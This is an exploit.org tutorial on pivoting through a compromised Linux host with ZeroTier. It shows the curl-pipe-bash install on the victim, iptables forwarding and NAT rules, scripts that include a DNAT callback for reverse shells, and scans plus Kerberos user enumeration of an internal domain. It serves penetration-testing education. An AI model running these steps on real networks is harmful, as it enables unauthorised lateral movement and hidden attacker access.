Axis Shift: Pivoting using ZeroTier

Pivoting is a specific process in post-exploitation in which an attacker expands his presence in the network. This article is about pivoting using ZeroTier.

Caster - Axis Shift

Genre: Offensive
Label: exploit.org
Release Date: 04.09.2024

Performed by: Caster
Written by: Magama Bazarov
Mastered by: Magama Bazarov
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)

Intro

Pivoting (from the word pivot) is the post-exploitation phase in which the attacker expands their presence in the network: an already compromised host is used as a foothold to get past network isolation, firewalls, NAT and whatever else sits between the attacker and the next segment. There is no single best pivoting method; the choice depends on the situation. In this article we will talk about ZeroTier.

Disclaimer

This article is for informational purposes and is intended for security specialists conducting testing under an agreed contract. The author and exploit.org are not responsible for any damage caused by the use of the information provided.

Disrupting systems and breaking into other people's computer networks is prosecuted by law. Be careful and do not try your luck.

What is ZeroTier?

ZeroTier is software that creates virtual networks on top of your existing Internet connectivity: it joins devices and whole networks into a single virtual Ethernet segment regardless of their physical location. Its main advantages are simplicity and flexibility of configuration and the ability to get through NAT without any router or firewall changes on either side.

Technically ZeroTier is an encrypted overlay: every node has its own key pair, nodes find each other through ZeroTier's root servers, and wherever NAT traversal succeeds they exchange traffic directly peer-to-peer over UDP, which keeps latency low and throughput high.

What's ZeroTier for?

ZeroTier is a very useful tool, it is handy for:

  1. Remote work: Create a virtual network to connect employees or clients working from different locations;
  2. Connecting disparate networks: ZeroTier allows multiple networks to be connected into a single logical network, providing connectivity between segments that cannot be physically connected;
  3. Pentesting: Bypasses network barriers and connects to secure network segments, making it an ideal tool for security professionals and pentesters;
  4. Gaming and multimedia: Create local networks to play games or share multimedia files among friends and family.

ZeroTier Plans


ZeroTier Features

ZeroTier has several features, among them:

  1. P2P connections: ZeroTier supports direct P2P connections between nodes, which minimizes latency and increases throughput;
  2. Flexible routing: Supports complex routing, including overlapping networks and dual-NAT networks;
  3. Cross-platform: ZeroTier runs on multiple platforms, including Windows, macOS, Linux, Android, iOS;
  4. Easy Setup: ZeroTier setup is simple and does not require deep knowledge of network engineering.

Benefits of ZeroTier

ZeroTier has the following advantages:

  1. Easy to use: ZeroTier can be set up and used even without much networking experience;
  2. Scalability: It allows you to easily scale your network by adding new nodes to your virtual network without having to reconfigure;
  3. Flexibility: It supports complex network topologies and can be used for a wide variety of applications, from simply connecting a pair of devices to creating complex enterprise networks;
  4. Free version: ZeroTier provides a free version, making it accessible to a wide range of users.

ZeroTier Disadvantages

Despite how good ZeroTier is, it also has drawbacks, including:

  1. Internet dependency: every node needs a working connection to ZeroTier's root servers (UDP/9993 by default, with a TCP fallback to 443) to find its peers. In a pentest the compromised host does not always have outbound Internet access;
  2. Management through the cloud: although the networks are private, they are administered through ZeroTier Central, which sees node IDs, assigned addresses and last-seen times. That may raise privacy concerns, and it also means the pivot leaves a record outside the target's network;
  3. Limitations of the free version: the free plan caps the number of members per network and leaves out some features, which may not be enough for large enterprise needs;
  4. Potential delays: despite P2P support, traffic is relayed through a root server when a direct path cannot be established, and latency rises accordingly;
  5. Privileges: zerotier-one needs root to create its tap interface, and zerotier-cli needs to read the service's authtoken.secret. A pentester with only user-level access on the compromised host cannot use it;
  6. Noise: the installation leaves a package, a running zerotier-one process, a listening UDP socket and a new zt* interface on the host, all of which host inventory or EDR can easily notice.

ZeroTier Outro

For our purposes ZeroTier is a fine pivoting tool. The idea is simple: the attacker creates a virtual network, places their own machine and the compromised machine in it, and then routes through the compromised machine into the rest of the infrastructure.

Infrastructure

For this article I have prepared the following infrastructure. The attacker is on the Internet and has already compromised a machine inside the network, escalated privileges and gained full control of the host. The compromised host has a second interface, eth1, facing the corporate network where the Windows workstations and the domain controller live. The goal is to reach that corporate infrastructure through the compromised host by building a ZeroTier network.

Topology infrastructure for Axis Shift

Machine    Operating System
Attacker   Debian 12
Victim     Debian 12
AD         Windows Server 2022
RB7        Windows 10 Enterprise
RB8        Windows 10 Enterprise
RB9        Windows 10 Enterprise

Machine         Address
Attacker        89.169.135.43
Victim (eth0)   192.168.0.40/24
Victim (eth1)   172.16.150.225/24
AD              172.16.150.222/24
RB7             172.16.150.223/24
RB8             172.16.150.221/24
RB9             172.16.150.224/24

Creating ZT Network

To create a ZeroTier network you need to create an account at zerotier.com, then after registering your account you'll be greeted with this:

ZeroTier Plans

In our case the Basic plan is enough. After selecting it, we get to the ZeroTier network management interface, which looks like this:

Control Panel

Click on “Create A Network” to create a ZeroTier virtual network. A network with a random name and a unique 16-hex-digit ID is created. In my case the ID is 3efa5cb78aa3463e and the name is suspicious_kleinrock.

Created Network

ZT Network Settings

When a ZeroTier virtual network is created, it is necessary to assign addressing to it so that each host within the ZeroTier virtual network has its own address on the interface. In my case, I decided to select the 192.168.196.0/24 range for the ZeroTier network:

ZeroTier Network Addressing

All in all, the ZeroTier virtual network is ready, now we just need to add the machine we need. Specifically, the attacker's machine and the compromised machine.

Actions of the attacker host

To run ZeroTier on a Linux host it has to be installed first; the vendor's installer script does this in one line:

ssh [email protected]
caster@caster:~$ curl -s https://install.zerotier.com | sudo bash

This installs the zerotier-one package and starts the service. To add your machine to the ZeroTier network you need the network ID and join it with the following command:

caster@caster:~$ sudo zerotier-cli join 3efa5cb78aa3463e
200 join OK
3efa5cb78aa3463e is the ID of the network created above. A successful join answers 200 join OK, but on a private network the node gets no address until it has been authorized in the control panel.

Once you've connected to the ZeroTier network, you'll see this in your control panel:

Host Appearance (Attacker)

The attacker host that has just joined must now be authorized on the network (unauthorized members of a private network stay without an address); this is done by ticking the authorization checkbox for it:

Host Authorization

The attacker's machine is now an authorized member and has received an address from the 192.168.196.0/24 range configured earlier.

On the host this shows up as a new virtual interface (its name, ztrfyp74nu here, is derived from the network ID, so it is the same on every Linux member) with the assigned address:

caster@caster:~$ ifconfig ztrfyp74nu
ztrfyp74nu: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 2800
        inet 192.168.196.58  netmask 255.255.255.0  broadcast 192.168.196.255
        inet6 fe80::3c2b:90ff:fedd:9263  prefixlen 64  scopeid 0x20<link>
        ether 3e:2b:90:dd:92:63  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 13  bytes 1006 (1.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

This completes the initial configuration of the ZeroTier virtual network, now it's time to connect the previously compromised machine to the ZT network.

Actions of the victim host

Now we need to install ZeroTier on the compromised system, in our case Debian 12. The attacker already has root there, so no sudo is needed:

@compromised:~# curl -s https://install.zerotier.com | bash

Then connecting to our ZT network:

@compromised:~# zerotier-cli join 3efa5cb78aa3463e
200 join OK

After this action, the following will appear in the ZeroTier Network Control Panel:

Host Appearance (Victim)

The compromised machine must be authorized in the same way before it becomes a member of the ZeroTier network and gets a virtual interface with an assigned address:

Host Authorization

Once the compromised host was authorized on the ZeroTier network, it had its own address and interface:

@compromised:~# ifconfig ztrfyp74nu
ztrfyp74nu: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 2800
        inet 192.168.196.59  netmask 255.255.255.0  broadcast 192.168.196.255
        inet6 fe80::3c2d:27ff:fe62:e6b6  prefixlen 64  scopeid 0x20<link>
        ether 3e:2d:27:62:e6:b6  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 45  bytes 5651 (5.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ZeroTier Host           Address          MAC                 ZeroTier Version
Attacker (6d3357253f)   192.168.196.58   3e:2b:90:dd:92:63   1.14.0
Victim (6b84e851ea)     192.168.196.59   3e:2d:27:62:e6:b6   1.14.0

Verify connectivity between the attacker and the compromised host within the ZeroTier network:

caster@caster:~$ ping 192.168.196.59
PING 192.168.196.59 (192.168.196.59) 56(84) bytes of data.
64 bytes from 192.168.196.59: icmp_seq=1 ttl=64 time=93.2 ms
64 bytes from 192.168.196.59: icmp_seq=2 ttl=64 time=87.0 ms
64 bytes from 192.168.196.59: icmp_seq=3 ttl=64 time=87.0 ms
64 bytes from 192.168.196.59: icmp_seq=4 ttl=64 time=88.9 ms
64 bytes from 192.168.196.59: icmp_seq=5 ttl=64 time=87.0 ms
64 bytes from 192.168.196.59: icmp_seq=6 ttl=64 time=88.9 ms
^C
--- 192.168.196.59 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5005ms
rtt min/avg/max/mdev = 86.966/88.663/93.202/2.206 ms

Ping between attacker and victim inside ZT network

192.168.196.59 is the address of the compromised machine

Pivoting

Looking at the interfaces of the compromised system, we notice a second interface, eth1, that leads to another network. That is exactly what interests a pentester who wants to go deeper into the infrastructure. Through the ZeroTier network just built, the attacker will gain access to the segment behind eth1:

@compromised:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.40  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 fe80::20c:29ff:feed:82f7  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:ed:82:f7  txqueuelen 1000  (Ethernet)
        RX packets 3647  bytes 3619738 (3.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3104  bytes 358721 (350.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.150.225  netmask 255.255.255.0  broadcast 172.16.150.255
        ether 00:0c:29:ed:82:01  txqueuelen 1000  (Ethernet)
        RX packets 8  bytes 1468 (1.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 27  bytes 3099 (3.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2824  bytes 173142 (169.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2824  bytes 173142 (169.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ztrfyp74nu: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 2800
        inet 192.168.196.59  netmask 255.255.255.0  broadcast 192.168.196.255
        inet6 fe80::3c2d:27ff:fe62:e6b6  prefixlen 64  scopeid 0x20<link>
        ether 3e:2d:27:62:e6:b6  txqueuelen 1000  (Ethernet)
        RX packets 11  bytes 966 (966.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 65  bytes 8678 (8.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Victim Interface   Address
eth0               192.168.0.40
eth1               172.16.150.225

The compromised machine will be the gateway to the 172.16.150.0/24 network, but for that it has to forward packets, which requires two things to be configured:

  1. Enabling IP forwarding;
  2. Firewall rules (FORWARD chain) and NAT.

First, IP forwarding must be enabled; it is off by default on Linux distributions:

@compromised:~# sysctl -w net.ipv4.ip_forward=1
net.ipv4.ip_forward = 1

This setting lasts only until the next reboot. It could be made permanent by uncommenting net.ipv4.ip_forward=1 in /etc/sysctl.conf, but on a compromised host that is a lasting change to a client system; for a pentest the runtime setting is the better choice, and it should be set back to 0 once the pivot is no longer needed.

Next, firewall rules (iptables) are needed so that traffic from the ZeroTier network can be forwarded into the 172.16.150.0/24 segment and the replies can come back:

First rule:

@compromised:~# iptables -A FORWARD -i eth1 -o ztrfyp74nu -m state --state RELATED,ESTABLISHED -j ACCEPT

What does the first rule do?

  1. -A FORWARD: Adds a rule to the FORWARD chain, which is responsible for forwarding packets between interfaces;
  2. -i eth1: Indicates that the rule applies to incoming packets on interface eth1;
  3. -o ztrfyp74nu: Indicates that the rule is applicable to outgoing packets that are sent through the ztrfyp74nu interface;
  4. -m state --state RELATED,ESTABLISHED: Restricts the rule to packets that belong to a connection the connection tracker already knows (ESTABLISHED) or that are related to one, such as ICMP errors for it (RELATED); new connections initiated from the eth1 side do not match;
  5. -j ACCEPT: Indicates that packets matching this rule should be allowed.

This rule allows packets to be forwarded from interface eth1 to interface ztrfyp74nu for those connections that have already been established or are part of a previously established connection. This is important to maintain active connections between the two interfaces, such as reply packets, and to prevent them from being blocked.

Second rule

@compromised:~# iptables -A FORWARD -i ztrfyp74nu -o eth1 -j ACCEPT

What does the second rule do?

  1. -A FORWARD: Adds a rule to the FORWARD chain;
  2. -i ztrfyp74nu: Indicates that the rule applies to incoming packets on interface ztrfyp74nu;
  3. -o eth1: Indicates that the rule applies to outgoing packets that are sent over interface eth1;
  4. -j ACCEPT: Indicates that packets matching this rule should be allowed.

This rule permits forwarding of all packets from ztrfyp74nu to eth1, i.e. from the ZeroTier network into the physical segment. Note that as written it has no -s restriction, so any member of the ZeroTier network, not only the attacker, can use the pivot; adding -s 192.168.196.58 limits it to the attacker's own address.

The attacker also needs a route to the 172.16.150.0/24 network. Rather than adding it by hand on every member, it is configured once as a managed route in the ZT control panel (network settings, Managed Routes), with the compromised machine's ZeroTier address as the next hop. ZeroTier then pushes it to every member that accepts managed routes (allowManaged, which is on by default and can be re-enabled with zerotier-cli set 3efa5cb78aa3463e allowManaged=1):

Adding route through 192.168.196.59
192.168.196.59 - Victim's address inside the ZT network

Make sure the route shows up in the attacker's routing table (route -n output; ZeroTier installs managed routes with metric 5000):

172.16.150.0    192.168.196.59  255.255.255.0   UG    5000   0        0 ztrfyp74nu

Important rule for NAT

Now we need a final rule for the firewall, and it deals with NAT:

@compromised:~# iptables -t nat -A POSTROUTING -o eth1 -s 192.168.196.0/24 -j MASQUERADE

What does this rule do?

  1. -t nat: This flag indicates that the rule should be added to the nat (Network Address Translation) table. This table is used to change the source or destination addresses of packets passing through the router;
  2. -A POSTROUTING: This flag means that the rule is added to the POSTROUTING chain. The POSTROUTING chain processes packets after they are routed, but before they leave the interface. That is, the rule is applied at the packet's exit from the system.
  3. -o eth1: This flag indicates that the rule applies only to packets that exit through the eth1 interface. If your Internet or other network connection interface is named differently, you must specify the appropriate interface instead of eth1.
  4. -s 192.168.196.0/24: This flag indicates that the rule applies only to packets originating from the 192.168.196.0/24 subnet. This is your ZeroTier subnet.
  5. -j MASQUERADE: The -j flag specifies the action for matching packets. MASQUERADE rewrites the packet's source address to the address of the interface it leaves through, here eth1 (172.16.150.225), and the connection tracker remembers the mapping so that the reply can be translated back.

When a packet from the 192.168.196.0/24 subnet is routed out through eth1, this rule rewrites its source address to that of eth1. This is called masquerading, and it is what lets the ZeroTier network reach 172.16.150.0/24 without touching anything in that segment: the hosts there have no route to 192.168.196.0/24, so without NAT their replies would go to their default gateway and never come back. With NAT they see all of the attacker's traffic as coming from the compromised host itself, 172.16.150.225, which also means it is indistinguishable from that host's own traffic at the network level.
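The whole configuration from this section, as an added example that is not part of the original article: a small POSIX shell script for the compromised host that renders the three iptables rules and applies or reverts them together with the ip_forward setting, so the pivot can be removed cleanly at the end of the engagement. The interface names and subnet are the ones used above but are passed as arguments; the -s restriction to a single source and the state file under /run are this example's own choices, not the article's.

```shell
#!/bin/sh
# Added example (not from the original article): the pivot host's forwarding
# and NAT configuration as one script with apply / revert / status modes.
# Interface names and addresses from the article are passed as arguments;
# the -s restriction to a single source and the state file are this
# example's own choices.
set -eu

STATE=/run/zt-pivot.ip_forward   # where apply remembers the old ip_forward value

# Print the iptables commands for one pivot, one per line.
#   $1  ZeroTier interface on the pivot (ztrfyp74nu)
#   $2  inside interface towards the target segment (eth1)
#   $3  source to admit and masquerade: the whole ZeroTier subnet as in the
#       article (192.168.196.0/24) or, tighter, only the attacker's /32
#   $4  A to add the rules, D to delete the same rules again
pivot_rules() {
    local zt="$1" inside="$2" src="$3" op="${4:-A}"
    case "$op" in
        A|D) ;;
        *) echo "pivot_rules: op must be A or D, got '$op'" >&2; return 1 ;;
    esac
    # Return path: only replies to connections that the ZeroTier side opened.
    printf 'iptables -%s FORWARD -i %s -o %s -m state --state RELATED,ESTABLISHED -j ACCEPT\n' \
        "$op" "$inside" "$zt"
    # Forward path, limited to $src. The article's rule has no -s and so
    # admits every member of the ZeroTier network, not just the attacker.
    printf 'iptables -%s FORWARD -i %s -o %s -s %s -j ACCEPT\n' \
        "$op" "$zt" "$inside" "$src"
    # Hide $src behind the inside interface's own address (172.16.150.225).
    printf 'iptables -t nat -%s POSTROUTING -o %s -s %s -j MASQUERADE\n' \
        "$op" "$inside" "$src"
}

# Run as root on the compromised host. Nothing is made persistent (no
# iptables-save, no /etc/sysctl.conf edit): a reboot undoes it, revert undoes it now.
pivot_apply() {
    cat /proc/sys/net/ipv4/ip_forward > "$STATE"
    sysctl -w net.ipv4.ip_forward=1 >/dev/null
    pivot_rules "$@" A | while IFS= read -r rule; do eval "$rule"; done
}

pivot_revert() {
    pivot_rules "$@" D | while IFS= read -r rule; do eval "$rule"; done
    # restore the value ip_forward had before apply (0 if unknown)
    sysctl -w "net.ipv4.ip_forward=$(cat "$STATE" 2>/dev/null || echo 0)" >/dev/null
    rm -f "$STATE"
}

pivot_status() {
    printf 'ip_forward=%s\n' "$(cat /proc/sys/net/ipv4/ip_forward)"
    iptables -S FORWARD
    iptables -t nat -S POSTROUTING
}

case "${1:-}" in
    apply)  shift; pivot_apply "$@" ;;
    revert) shift; pivot_revert "$@" ;;
    status) pivot_status ;;
esac
```

On the pivot, as root: sh zt-pivot.sh apply ztrfyp74nu eth1 192.168.196.58/32 puts everything in place, sh zt-pivot.sh status shows the forwarding flag and the live rules, and sh zt-pivot.sh revert ztrfyp74nu eth1 192.168.196.58/32 removes it all again (same arguments, because iptables -D needs the exact rule specification). Passing 192.168.196.0/24 instead of the /32 reproduces the article's rules exactly, apart from the -s on the forward rule.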

Result

After all of the above configuration, the attacker has access to the 172.16.150.0/24 network that was behind the compromised machine on the second interface.

PoC I: NetExec

caster@caster:~$ netexec smb 172.16.150.0/24
SMB         172.16.150.222  445    AD               [*] Windows Server 2022 Build 20348 x64 (name:AD) (domain:f1.com) (signing:True) (SMBv1:False)
SMB         172.16.150.223  445    RB7              [*] Windows 10 / Server 2019 Build 19041 (name:RB7) (domain:RB7) (signing:False) (SMBv1:False)
SMB         172.16.150.224  445    RB9              [*] Windows 10 / Server 2019 Build 19041 (name:RB9) (domain:RB9) (signing:False) (SMBv1:False)
SMB         172.16.150.221  445    RB8              [*] Windows 10 / Server 2019 Build 19041 (name:RB8) (domain:RB8) (signing:False) (SMBv1:False)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

PoC II: Services Scanning

caster@caster:~$ sudo nmap -n -sS -p 88,445,22 172.16.150.0/24 --open --min-rate=1280
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 23:36 UTC
Nmap scan report for 172.16.150.221
Host is up (0.090s latency).
Not shown: 2 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 172.16.150.222
Host is up (0.086s latency).
Not shown: 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
88/tcp  open  kerberos-sec
445/tcp open  microsoft-ds

Nmap scan report for 172.16.150.223
Host is up (0.087s latency).
Not shown: 2 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 172.16.150.224
Host is up (0.087s latency).
Not shown: 2 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 172.16.150.225
Host is up (0.086s latency).
Not shown: 2 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

PoC III: Kerberos Attacks (Enumeration)

The attacker's host is not using the domain's DNS, so ad.f1.com has to resolve locally first (for example an /etc/hosts entry pointing at 172.16.150.222); with that in place kerbrute reaches the KDC on port 88 through the pivot:

caster@caster:~$ ./kerbrute userenum --dc ad.f1.com -d f1.com kerusernames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 09/03/24 - Ronnie Flathers @ropnop

2024/09/03 23:56:03 >  Using KDC(s):
2024/09/03 23:56:03 >   ad.f1.com:88

2024/09/03 23:56:03 >  [+] VALID USERNAME:       [email protected]
2024/09/03 23:56:03 >  [+] VALID USERNAME:       [email protected]
2024/09/03 23:56:03 >  [+] VALID USERNAME:       [email protected]
2024/09/03 23:56:03 >  Done! Tested 4 usernames (3 valid) in 0.271 seconds

Now the attacker can interact with this subnet further: look for vulnerabilities and continue the offensive work. This is how this pivoting method works.

Keep in mind, though, that because of the MASQUERADE rule on the compromised machine the attacker is behind NAT as far as the 172.16.150.0/24 hosts are concerned: they see every packet as coming from 172.16.150.225 and cannot initiate a connection to 192.168.196.58 themselves. Anything that needs a callback (a reverse shell, a listener for NTLM relay or authentication coercion) must therefore listen on the compromised host's eth1 address or be port-forwarded from it to the attacker.
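One way to handle that callback problem, as an added example that is not part of the original article: publish a TCP port on the pivot's eth1 address and DNAT it to the attacker's ZeroTier address, so a host in 172.16.150.0/24 that connects to 172.16.150.225 on that port actually lands on the attacker's listener. The interface names and addresses are the article's and are passed as arguments; the port 4444 in the usage note is an assumption.

```shell
#!/bin/sh
# Added example (not from the original article): give hosts in the target
# segment a way to call back to the attacker through the pivot. Because of
# MASQUERADE they can only reach 172.16.150.225, so a listener port is
# published there and DNAT'ed to the attacker's ZeroTier address.
# Interface names and addresses from the article are passed as arguments.
set -eu

# Print the iptables commands, one per line.
#   $1  inside interface of the pivot (eth1)   $2  its address (172.16.150.225)
#   $3  ZeroTier interface (ztrfyp74nu)        $4  attacker's ZT address (192.168.196.58)
#   $5  TCP port to publish                    $6  A to add, D to delete
reverse_rules() {
    local inside="$1" inside_ip="$2" zt="$3" attacker="$4" port="$5" op="${6:-A}"
    case "$op" in
        A|D) ;;
        *) echo "reverse_rules: op must be A or D, got '$op'" >&2; return 1 ;;
    esac
    case "$port" in
        ''|*[!0-9]*) echo "reverse_rules: bad port '$port'" >&2; return 1 ;;
    esac
    if [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
        echo "reverse_rules: port out of range: $port" >&2; return 1
    fi
    # PREROUTING runs before the routing decision, so a packet for the
    # pivot's own address is forwarded to the attacker instead of being
    # delivered locally. conntrack reverses the translation on the replies.
    printf 'iptables -t nat -%s PREROUTING -i %s -p tcp -d %s --dport %s -j DNAT --to-destination %s:%s\n' \
        "$op" "$inside" "$inside_ip" "$port" "$attacker" "$port"
    # The article's eth1 -> ZT forward rule only accepts RELATED,ESTABLISHED;
    # the DNAT'ed SYN is a NEW connection and needs its own ACCEPT.
    printf 'iptables -%s FORWARD -i %s -o %s -p tcp -d %s --dport %s -j ACCEPT\n' \
        "$op" "$inside" "$zt" "$attacker" "$port"
}

# Run as root on the compromised host; same arguments for apply and revert.
case "${1:-}" in
    apply)  shift; reverse_rules "$@" A | while IFS= read -r rule; do eval "$rule"; done ;;
    revert) shift; reverse_rules "$@" D | while IFS= read -r rule; do eval "$rule"; done ;;
esac
```

With sh zt-callback.sh apply eth1 172.16.150.225 ztrfyp74nu 192.168.196.58 4444 on the pivot and a listener bound on all interfaces on the attacker's side, a payload on RB7 that connects to 172.16.150.225:4444 arrives at the attacker with RB7's real source address; the attacker's replies follow the managed route back through the pivot, and the article's ztrfyp74nu -> eth1 forward rule lets them out. Revert it with the same arguments when the listener is no longer needed.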

Outro

In this article, I looked at the process of pivoting using ZeroTier, a powerful tool that can greatly enhance an attacker's post-exploitation capabilities. ZeroTier makes it easy to bypass network isolation and penetrate protected network segments while providing flexibility and ease of customization.

I hope this material has been helpful in understanding the capabilities of ZeroTier in the context of pentesting. Proper use of such tools can help security professionals find and remediate vulnerabilities, thereby improving the overall security of corporate networks.
